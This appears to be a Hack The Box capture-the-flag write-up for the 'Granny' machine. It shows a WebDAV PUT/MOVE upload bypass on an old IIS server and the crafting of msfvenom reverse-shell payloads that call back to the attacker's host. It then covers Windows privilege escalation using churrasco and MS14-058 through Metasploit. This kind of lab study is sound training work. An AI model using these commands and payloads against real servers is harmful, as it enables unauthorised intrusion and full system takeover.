Hackthebox writeup for granny

6 min readJul 10, 2021

Mind Opener

The http protocol allows us to use methods like GET , POST, PUT, DELETE to send/delete data, however are there any methods with which we can edit, copy or manage files on a remote server ?

If such protocol/extension allows you to copy or move files, can you abuse this functionality to compromise a server ?

As always, begin with the nmap scan,

From the nmap scan, three things are important

Port 80 is open and running outdated Microsoft IIS server.

2. The webdav(extension of http protocol) is being used.

3. Multiple HTTP methods are allowed.

What is webdav ?
WebDAV stands for “Web-based Distributed Authoring and Versioning”. It is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.

Use the davtest scanner, which uploads test executable to determine if the services are exploitable.

davtest -url http://10.10.10.15

To analyze the working of webdav add a new proxy listener on burp and redirect its traffic to the victim.

Adding a new listener to burp to intercept webdav traffic

curl localhost
davtest -url http://localhost

From burp history, grab a file that’s successfully uploaded and send this to repeater.

From the repeater tab create another html file.

The good news is,

We can simply access the upload directory(no dirbuster this time !)
We are also permitted to upload a file

Create a payload using msfvenom.

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.20 LPORT=4455 -o shell.aspx

but the bad news is, putting aspx file is forbidden.

From the nmap scan we know that the MOVE method is allowed. About webdav features read here

MOVE method syntax below,

MOVE /source HTTP/1.1
Destination: /destination

The burpsuite method was described in the ippsec video(the best), however as I read further(Specially thanks to 0xdf articles)… I came to know that it is possible to upload shell using curl as well (Various different syntaxes in that too). I have learnt and tried both the methods.

Shell upload using burpsuite

Rename the msfvenom payload to testshell.html and upload with PUT method.

And then use the move method change the extension to aspx.

Start a netcat listener and grab shell.

curl http://10.10.10.15/shell.aspx

Shell upload using curl

Rename shell.aspx to shell.txt and upload

cp shell.aspx shell.txt
curl http://10.10.10.15 — upload-file shell.txt

Rename it back to aspx with MOVE.

curl -X MOVE --header “Destination:http://10.10.10.15/aspshell.aspx" http://10.10.10.15/shell.txt

X, — request <command> Specify request command to use
-H, — header <header/@file> Pass custom header(s) to server

and grab shell.

This machine shows access denied while trying to grab the user.txt flag. So we’ll move to privilage escalation.

Privilege Escalation

Run windows exploit suggester

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Check its readme file for the usage and proceed

./windows-exploit-suggester.py --update

An excel file is created at this step

Run the systeminfo command on the granny machine and paste its output on the attacker machine, save it in the systeminfo.txt file.

I had to install few xlrd packages, commands are listed in the screenshot below. After installing the packages, run exploit suggester.

./windows_exploit_suggester.py --database 2021-07-09-mssb.xls --systeminfo systeminfo.txt

Multiple exploits are suggested, since I had used MS15–051 in bastard machine, I did not try it here and went ahead with the churrasco exploit.

Mor about Access tokens, ACL and token hijacking at below given links,

https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens?redirectedfrom=MSDN

https://dl.packetstormsecurity.net/papers/presentations/TokenKidnapping.pdf

Priv Esc in Action

Upload and rename the churrasco.exe file using the same methods that we used earlier

curl -X MOVE --header "Destination:http://10.10.10.15/chr.exe" http://10.10.10.15/chr.txt

The file is moved to the inetpub/wwwroot directory, but we do not have write permission. So create a temp directory and copy our exploit.

chr.exe -d “cmd” executes the command, however it does not give us a stable system shell. So we create a reverse shell executable and use churrasco to execute it to get an admin session.

Generate reverse shell and copy it to granny with same methods discussed previously.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=6677 -f exe -o revshell.exe

Copy the revshell to granny machine and exploit using the churrisco.exe file that we copied earlier.

Grab the system shell at netcat server and catpure the flag.

Granny Exploitation using metasploit

Generate a payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=5566 -f aspx > payload.aspx

Upload the payload to server

In the msfconsole, start the exploit/multi/handler module

use exploit/multi/handler

Tell meterpreter which payload to expect, so we configure it to have the same settings as the executable we generated.

set payload windows/meterpreter/reverse_tcp

Visit the file in browser and it opens a meterpreter session for us.

We cannot capture the user flag, as access is denied

So, we need to move to privilage escalation, background the session and use exploit suggester as below, set session and run

Use MS14–058 and run

Grab the root flag

Skills that I learnt from this machine

List and understand the usage of http methods
Incorporate the use of http methods with curl / burpsuite repeater to put, move / copy data
Use the webdav MOVE method to replace files with executables
Practical hands on of msfvenom and meterpreter
Using windows exploit suggester and churrasco exploit for privilage escalation.